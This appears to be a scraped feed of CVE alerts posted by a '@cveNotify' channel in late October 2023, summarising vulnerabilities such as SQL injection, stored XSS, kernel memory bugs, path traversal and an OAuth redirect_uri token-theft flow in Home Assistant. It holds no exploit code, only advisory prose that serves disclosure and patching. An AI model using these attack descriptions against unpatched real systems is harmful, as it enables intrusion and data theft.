🚨 CVE-2023-43192SQL injection can exist in a newly created part of the SpringbootCMS 1.0 background, and the parameters submitted by users are not filtered. As a result, special characters in parameters destroy the original logic of SQL statements. Attackers can use this vulnerability to execute any SQL statement.🎖@cveNotify |
|
| 2023-10-26 22:52:33 |
🚨 CVE-2023-35074The issue was addressed with improved memory handling. This issue is fixed in tvOS 17, Safari 17, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-10-26 20:54:24 |
🚨 CVE-2023-0879Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.12.🎖@cveNotify |
|
| 2023-10-26 20:54:22 |
🚨 CVE-2023-0748Open Redirect in GitHub repository btcpayserver/btcpayserver prior to 1.7.6.🎖@cveNotify |
|
| 2023-10-26 20:54:20 |
🚨 CVE-2023-41893Home assistant is an open source home automation. The audit team’s analyses confirmed that the `redirect_uri` and `client_id` are alterable when logging in. Consequently, the code parameter utilized to fetch the `access_token` post-authentication will be sent to the URL specified in the aforementioned parameters. Since an arbitrary URL is permitted and `homeassistant.local` represents the preferred, default domain likely used and trusted by many users, an attacker could leverage this weakness to manipulate a user and retrieve account access. Notably, this attack strategy is plausible if the victim has exposed their Home Assistant to the Internet, since after acquiring the victim’s `access_token` the adversary would need to utilize it directly towards the instance to achieve any pertinent malicious actions. To achieve this compromise attempt, the attacker must send a link with a `redirect_uri` that they control to the victim’s own Home Assistant instance. In the eventuality the victim authenticates via said link, the attacker would obtain code sent to the specified URL in `redirect_uri`, which can then be leveraged to fetch an `access_token`. Pertinently, an attacker could increase the efficacy of this strategy by registering a near identical domain to `homeassistant.local`, which at first glance may appear legitimate and thereby obfuscate any malicious intentions. This issue has been addressed in version 2023.9.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-26 20:54:16 |
🚨 CVE-2023-41358An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c processes NLRIs if the attribute length is zero.🎖@cveNotify |
|
| 2023-10-26 20:54:13 |
🚨 CVE-2023-3090A heap out-of-bounds write vulnerability in the Linux Kernel ipvlan network driver can be exploited to achieve local privilege escalation.The out-of-bounds write is caused by missing skb->cb initialization in the ipvlan network driver. The vulnerability is reachable if CONFIG_IPVLAN is enabled.We recommend upgrading past commit 90cbed5247439a966b645b34eb0a2e037836ea8e.🎖@cveNotify |
|
| 2023-10-26 20:54:11 |
🚨 CVE-2023-21400In multiple functions of io_uring.c, there is a possible kernel memory corruption due to improper locking. This could lead to local escalation of privilege in the kernel with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-26 20:54:09 |
🚨 CVE-2023-5615The Skype Legacy Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'skype-status' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-26 20:54:07 |
🚨 CVE-2023-31417Elasticsearch generally filters out sensitive information and credentials before logging to the audit log. It was found that this filtering was not applied when requests to Elasticsearch use certain deprecated URIs for APIs. The impact of this flaw is that sensitive information such as passwords and tokens might be printed in cleartext in Elasticsearch audit logs. Note that audit logging is disabled by default and needs to be explicitly enabled and even when audit logging is enabled, request bodies that could contain sensitive information are not printed to the audit log unless explicitly configured.🎖@cveNotify |
|
| 2023-10-26 20:54:06 |
🚨 CVE-2023-31418An issue has been identified with how Elasticsearch handled incoming requests on the HTTP layer. An unauthenticated user could force an Elasticsearch node to exit with an OutOfMemory error by sending a moderate number of malformed HTTP requests. The issue was identified by Elastic Engineering and we have no indication that the issue is known or that it is being exploited in the wild.🎖@cveNotify |
|
| 2023-10-26 19:22:06 |
🚨 CVE-2023-5790A vulnerability classified as critical was found in SourceCodester File Manager App 1.0. Affected by this vulnerability is an unknown functionality of the file endpoint/add-file.php. The manipulation of the argument uploadedFileName leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243595.🎖@cveNotify |
|
| 2023-10-26 19:22:05 |
🚨 CVE-2023-5791A vulnerability, which was classified as problematic, was found in SourceCodester Sticky Notes App 1.0. This affects an unknown part of the file endpoint/add-note.php. The manipulation of the argument noteTitle/noteContent leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243597 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-26 19:22:03 |
🚨 CVE-2023-5792A vulnerability has been found in SourceCodester Sticky Notes App 1.0 and classified as critical. This vulnerability affects unknown code of the file endpoint/delete-note.php. The manipulation of the argument note leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-243598 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-26 19:22:02 |
🚨 CVE-2023-5668The WhatsApp Share Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'whatsapp' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-26 19:22:00 |
🚨 CVE-2023-5613The Super Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tpsscode' shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-26 19:21:59 |
🚨 CVE-2023-5614The Theme Switcha plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'theme_switcha_list' shortcode in all versions up to, and including, 3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-26 19:21:57 |
🚨 CVE-2020-36698The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized user interaction in versions up to, and including, 2.50. This is due to missing capability checks on several AJAX actions and nonce disclosure in the source page of the administrative dashboard. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to call functions and delete and/or upload files.🎖@cveNotify |
|
| 2023-10-26 12:52:25 |
🚨 CVE-2023-31422An issue was discovered by Elastic whereby sensitive information is recorded in Kibana logs in the event of an error. The issue impacts only Kibana version 8.10.0 when logging in the JSON layout or when the pattern layout is configured to log the %meta pattern. Elastic has released Kibana 8.10.1 which resolves this issue. The error object recorded in the log contains request information, which can include sensitive data, such as authentication credentials, cookies, authorization headers, query params, request paths, and other metadata. Some examples of sensitive data which can be included in the logs are account credentials for kibana_system, kibana-metricbeat, or Kibana end-users.🎖@cveNotify |
|
| 2023-10-26 12:52:22 |
🚨 CVE-2023-31421It was discovered that when acting as TLS clients, Beats, Elastic Agent, APM Server, and Fleet Server did not verify whether the server certificate is valid for the target IP address; however, certificate signature validation is still performed. More specifically, when the client is configured to connect to an IP address (instead of a hostname) it does not validate the server certificate's IP SAN values against that IP address and certificate validation fails, and therefore the connection is not blocked as expected.🎖@cveNotify |
|
| 2023-10-26 12:52:20 |
🚨 CVE-2023-34319The fix for XSA-423 added logic to Linux'es netback driver to deal witha frontend splitting a packet in a way such that not all of the headerswould come in one piece. Unfortunately the logic introduced theredidn't account for the extreme case of the entire packet being splitinto as many pieces as permitted by the protocol, yet still beingsmaller than the area that's specially dealt with to keep all (possible)headers together. Such an unusual packet would therefore trigger abuffer overrun in the driver.🎖@cveNotify |
|
| 2023-10-26 05:52:33 |
🚨 CVE-2023-30967Gotham Orbital-Simulator service prior to 0.692.0 was found to be vulnerable to a Path traversal issue allowing an unauthenticated user to read arbitrary files on the file system.🎖@cveNotify |
|
| 2023-10-26 05:52:31 |
🚨 CVE-2023-30969The Palantir Tiles1 service was found to be vulnerable to an API wide issue where the service was not performing authentication/authorization on all the endpoints.🎖@cveNotify |
|
| 2023-10-26 05:52:29 |
🚨 CVE-2023-43905Incorrect access control in writercms v1.1.0 allows attackers to directly obtain backend account passwords via unspecified vectors.🎖@cveNotify |
|
| 2023-10-26 05:52:27 |
🚨 CVE-2023-43906Xolo CMS v0.11 was discovered to contain a reflected cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-10-26 05:52:24 |
🚨 CVE-2023-46345Catdoc v0.95 was discovered to contain a NULL pointer dereference via the component xls2csv at src/xlsparse.c.🎖@cveNotify |
|
| 2023-10-26 05:52:22 |
🚨 CVE-2023-46668If Elastic Endpoint (v7.9.0 - v8.10.3) is configured to use a non-default option in which the logging level is explicitly set to debug, and when Elastic Agent is simultaneously configured to collect and send those logs to Elasticsearch, then Elastic Agent API keys can be viewed in Elasticsearch in plaintext. These API keys could be used to write arbitrary data and read Elastic Endpoint user artifacts.🎖@cveNotify |
|
| 2023-10-26 05:52:20 |
🚨 CVE-2023-40401The issue was addressed with additional permissions checks. This issue is fixed in macOS Ventura 13.6.1. An attacker may be able to access passkeys without authentication.🎖@cveNotify |
|
| 2023-10-26 05:52:18 |
🚨 CVE-2023-40404A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-10-26 05:52:15 |
🚨 CVE-2023-40405A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.1. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-10-26 05:52:13 |
🚨 CVE-2023-40408An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Hide My Email may be deactivated unexpectedly.🎖@cveNotify |
|
| 2023-10-26 05:52:11 |
🚨 CVE-2023-40444A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-10-26 05:52:09 |
🚨 CVE-2023-40447The issue was addressed with improved memory handling. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Sonoma 14.1, Safari 17.1, tvOS 17.1. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-10-26 01:22:26 |
🚨 CVE-2023-41976A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Sonoma 14.1, Safari 17.1, tvOS 17.1. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-10-26 01:22:25 |
🚨 CVE-2023-41977The issue was addressed with improved handling of caches. This issue is fixed in macOS Sonoma 14.1, iOS 16.7.2 and iPadOS 16.7.2. Visiting a malicious website may reveal browsing history.🎖@cveNotify |
|
| 2023-10-26 01:22:23 |
🚨 CVE-2023-41982This issue was addressed by restricting options offered on a locked device. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. An attacker with physical access may be able to use Siri to access sensitive user data.🎖@cveNotify |
|
| 2023-10-26 01:22:22 |
🚨 CVE-2023-41983The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.1, Safari 17.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2023-10-26 01:22:21 |
🚨 CVE-2023-41988This issue was addressed by restricting options offered on a locked device. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 17.1 and iPadOS 17.1. An attacker with physical access may be able to use Siri to access sensitive user data.🎖@cveNotify |
|
| 2023-10-26 01:22:19 |
🚨 CVE-2023-41997This issue was addressed by restricting options offered on a locked device. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. An attacker with physical access may be able to use Siri to access sensitive user data.🎖@cveNotify |
|
| 2023-10-26 01:22:18 |
🚨 CVE-2023-42841The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-10-26 01:22:17 |
🚨 CVE-2023-42844This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. A website may be able to access sensitive user data when resolving symlinks.🎖@cveNotify |
|
| 2023-10-26 01:22:15 |
🚨 CVE-2023-42845An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1. Photos in the Hidden Photos Album may be viewed without authentication.🎖@cveNotify |
|
| 2023-10-26 01:22:13 |
🚨 CVE-2023-42846This issue was addressed by removing the vulnerable code. This issue is fixed in watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, tvOS 17.1, iOS 17.1 and iPadOS 17.1. A device may be passively tracked by its Wi-Fi MAC address.🎖@cveNotify |
|
| 2023-10-26 01:22:11 |
🚨 CVE-2023-42847A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1. An attacker may be able to access passkeys without authentication.🎖@cveNotify |
|
| 2023-10-26 01:22:10 |
🚨 CVE-2023-42849The issue was addressed with improved memory handling. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Monterey 12.7.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations.🎖@cveNotify |
|
| 2023-10-26 01:22:08 |
🚨 CVE-2023-42852A logic issue was addressed with improved checks. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Sonoma 14.1, Safari 17.1, tvOS 17.1. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-10-26 01:22:06 |
🚨 CVE-2023-42854This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to cause a denial-of-service to Endpoint Security clients.🎖@cveNotify |
|
| 2023-10-26 01:22:05 |
🚨 CVE-2023-42856The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. Processing a file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-10-26 01:22:03 |
🚨 CVE-2023-42857A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2023-10-26 01:22:00 |
🚨 CVE-2023-40413The issue was addressed with improved handling of caches. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Monterey 12.7.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-10-26 01:21:59 |
🚨 CVE-2023-40416The issue was addressed with improved memory handling. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. Processing an image may result in disclosure of process memory.🎖@cveNotify |
|
| 2023-10-26 01:21:58 |
🚨 CVE-2023-40421A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2023-10-26 01:21:56 |
🚨 CVE-2023-40423The issue was addressed with improved memory handling. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-10-25 20:52:25 |
🚨 CVE-2023-32359This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 16.7.2 and iPadOS 16.7.2. A user's password may be read aloud by VoiceOver.🎖@cveNotify |
|
| 2023-10-25 20:52:24 |
🚨 CVE-2023-40401The issue was addressed with additional permissions checks. This issue is fixed in macOS Ventura 13.6.1. An attacker may be able to access passkeys without authentication.🎖@cveNotify |
|
| 2023-10-25 20:52:23 |
🚨 CVE-2023-40404A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sonoma 14.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-10-25 20:52:20 |
🚨 CVE-2023-40405A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.1. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-10-25 20:52:19 |
🚨 CVE-2023-40408An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Hide My Email may be deactivated unexpectedly.🎖@cveNotify |
|
| 2023-10-25 20:52:17 |
🚨 CVE-2023-40444A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.1. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-10-25 20:52:16 |
🚨 CVE-2023-40445The issue was addressed with improved UI handling. This issue is fixed in iOS 17.1 and iPadOS 17.1. A device may persistently fail to lock.🎖@cveNotify |
|
| 2023-10-25 20:52:15 |
🚨 CVE-2023-40447The issue was addressed with improved memory handling. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Sonoma 14.1, Safari 17.1, tvOS 17.1. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-10-25 20:52:14 |
🚨 CVE-2023-40449The issue was addressed with improved memory handling. This issue is fixed in iOS 17.1 and iPadOS 17.1, macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. An app may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2023-10-25 20:52:12 |
🚨 CVE-2023-41072A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.1, iOS 17.1 and iPadOS 17.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2023-10-25 20:52:11 |
🚨 CVE-2023-41077The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.1. An app may be able to access protected user data.🎖@cveNotify |
|
| 2023-10-25 20:52:09 |
🚨 CVE-2023-41254A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Ventura 13.6.1, macOS Sonoma 14.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2023-10-25 20:52:07 |
🚨 CVE-2023-41975This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. A website may be able to access the microphone without the microphone use indicator being shown.🎖@cveNotify |
|
| 2023-10-25 20:52:06 |
🚨 CVE-2023-41976A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 17.1 and iPadOS 17.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, macOS Sonoma 14.1, Safari 17.1, tvOS 17.1. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-10-25 20:52:05 |
🚨 CVE-2023-41977The issue was addressed with improved handling of caches. This issue is fixed in macOS Sonoma 14.1, iOS 16.7.2 and iPadOS 16.7.2. Visiting a malicious website may reveal browsing history.🎖@cveNotify |
|
| 2023-10-25 20:52:04 |
🚨 CVE-2023-41982This issue was addressed by restricting options offered on a locked device. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. An attacker with physical access may be able to use Siri to access sensitive user data.🎖@cveNotify |
|
| 2023-10-25 20:52:02 |
🚨 CVE-2023-41983The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.1, Safari 17.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2023-10-25 20:52:01 |
🚨 CVE-2023-41988This issue was addressed by restricting options offered on a locked device. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 17.1 and iPadOS 17.1. An attacker with physical access may be able to use Siri to access sensitive user data.🎖@cveNotify |
|
| 2023-10-25 20:52:00 |
🚨 CVE-2023-41989The issue was addressed by restricting options offered on a locked device. This issue is fixed in macOS Sonoma 14.1. An attacker may be able to execute arbitrary code as root from the Lock Screen.🎖@cveNotify |
|
| 2023-10-25 20:51:58 |
🚨 CVE-2023-41997This issue was addressed by restricting options offered on a locked device. This issue is fixed in macOS Sonoma 14.1, watchOS 10.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. An attacker with physical access may be able to use Siri to access sensitive user data.🎖@cveNotify |
|
| 2023-10-25 18:52:00 |
🚨 CVE-2023-5254The ChatBot plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.8.9 via the qcld_wb_chatbot_check_user function. This can allow unauthenticated attackers to extract sensitive data including confirmation as to whether a user name exists on the site as well as order information for existing users.🎖@cveNotify |
|
| 2023-10-25 18:51:59 |
🚨 CVE-2022-24402The TETRA TEA1 keystream generator implements a key register initialization function that compresses the 80-bit key to only 32 bits for usage during the keystream generation phase, which is insufficient to safeguard against exhaustive search attacks.🎖@cveNotify |
|
| 2023-10-25 16:22:34 |
🚨 CVE-2023-2681An SQL Injection vulnerability has been found on Jorani version 1.0.0. This vulnerability allows an authenticated remote user, with low privileges, to send queries with malicious SQL code on the "/leaves/validate" path and the “id” parameter, managing to extract arbritary information from the database.🎖@cveNotify |
|
| 2023-10-25 16:22:33 |
🚨 CVE-2022-48118Jorani v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Acronym parameter.🎖@cveNotify |
|
| 2023-10-25 16:22:30 |
🚨 CVE-2022-34132Benjamin BALET Jorani v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at application/controllers/Leaves.php.🎖@cveNotify |
|
| 2023-10-25 16:22:28 |
🚨 CVE-2022-34133Benjamin BALET Jorani v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Comment parameter at application/controllers/Leaves.php.🎖@cveNotify |
|
| 2023-10-25 16:22:27 |
🚨 CVE-2022-34134Benjamin BALET Jorani v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /application/controllers/Users.php.🎖@cveNotify |
|
| 2023-10-25 16:22:26 |
🚨 CVE-2023-46229LangChain before 0.0.317 allows SSRF via document_loaders/recursive_url_loader.py because crawling can proceed from an external server to an internal server.🎖@cveNotify |
|
| 2023-10-25 16:22:24 |
🚨 CVE-2023-46228zchunk before 1.3.2 has multiple integer overflows via malformed zchunk files to lib/comp/comp.c, lib/comp/zstd/zstd.c, lib/dl/multipart.c, or lib/header.c.🎖@cveNotify |
|
| 2023-10-25 16:22:23 |
🚨 CVE-2023-35126An out-of-bounds write vulnerability exists within the parsers for both the "DocumentViewStyles" and "DocumentEditStyles" streams of Ichitaro 2023 1.0.1.59372 when processing types 0x0000-0x0009 of a style record with the type 0x2008. A specially crafted document can cause memory corruption, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-25 16:22:21 |
🚨 CVE-2023-45277Yamcs 5.8.6 is vulnerable to directory traversal (issue 1 of 2). The vulnerability is in the storage functionality of the API and allows one to escape the base directory of the buckets, freely navigate system directories, and read arbitrary files.🎖@cveNotify |
|
| 2023-10-25 16:22:20 |
🚨 CVE-2023-45278Directory Traversal vulnerability in the storage functionality of the API in Yamcs 5.8.6 allows attackers to delete arbitrary files via crafted HTTP DELETE request.🎖@cveNotify |
|
| 2023-10-25 16:22:18 |
🚨 CVE-2023-45281An issue in Yamcs 5.8.6 allows attackers to obtain the session cookie via upload of crafted HTML file.🎖@cveNotify |
|
| 2023-10-25 16:22:16 |
🚨 CVE-2023-3042In dotCMS, versions mentioned, a flaw in the NormalizationFilter does not strip double slashes (//) from URLs, potentially enabling bypasses for XSS and access controls. An example affected URL is https://demo.dotcms.com//html/portlet/ext/files/edit_text_inc.jsp https://demo.dotcms.com//html/portlet/ext/files/edit_text_inc.jsp , which should return a 404 response but didn't. The oversight in the default invalid URL character list can be viewed at the provided GitHub link https://github.com/dotCMS/core/blob/master/dotCMS/src/main/java/com/dotcms/filters/NormalizationFilter.java#L37 . To mitigate, users can block URLs with double slashes at firewalls or utilize dotCMS config variables.Specifically, they can use the DOT_URI_NORMALIZATION_FORBIDDEN_STRINGS environmental variable to add // to the list of invalid strings. Additionally, the DOT_URI_NORMALIZATION_FORBIDDEN_REGEX variable offers more detailed control, for instance, to block //html.* URLs.Fix Version:23.06+, LTS 22.03.7+, LTS 23.01.4+🎖@cveNotify |
|
| 2023-10-25 16:22:15 |
🚨 CVE-2023-34366A use-after-free vulnerability exists in the Figure stream parsing functionality of Ichitaro 2023 1.0.1.59372. A specially crafted document can cause memory corruption, resulting in arbitrary code execution. Victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-25 16:22:14 |
🚨 CVE-2023-22067Vulnerability in Oracle Java SE (component: CORBA). Supported versions that are affected are Oracle Java SE: 8u381 and 8u381-perf. Easily exploitable vulnerability allows unauthenticated attacker with network access via CORBA to compromise Oracle Java SE. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-10-25 16:22:12 |
🚨 CVE-2023-22081Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u381, 8u381-perf, 11.0.20, 17.0.8, 21; Oracle GraalVM for JDK: 17.0.8 and 21. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM for JDK. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-10-25 16:22:11 |
🚨 CVE-2023-22082Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Pod Admin). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-10-25 16:22:10 |
🚨 CVE-2023-35986Sante DICOM Viewer Pro lacks proper validation of user-supplied data when parsing DICOM files. This could lead to a stack-based buffer overflow. An attacker could leverage this vulnerability to execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2023-10-25 16:22:09 |
🚨 CVE-2023-38127An integer overflow exists in the "HyperLinkFrame" stream parser of Ichitaro 2023 1.0.1.59372. A specially crafted document can cause the parser to make an under-sized allocation, which can later allow for memory corruption, potentially resulting in arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-25 16:22:08 |
🚨 CVE-2023-36857Baker Hughes – Bently Nevada 3500 System TDI Firmware version 5.05 contains a replay vulnerability which could allow an attacker to replay older captured packets of traffic to the device to gain access.🎖@cveNotify |
|
| 2023-10-25 16:22:06 |
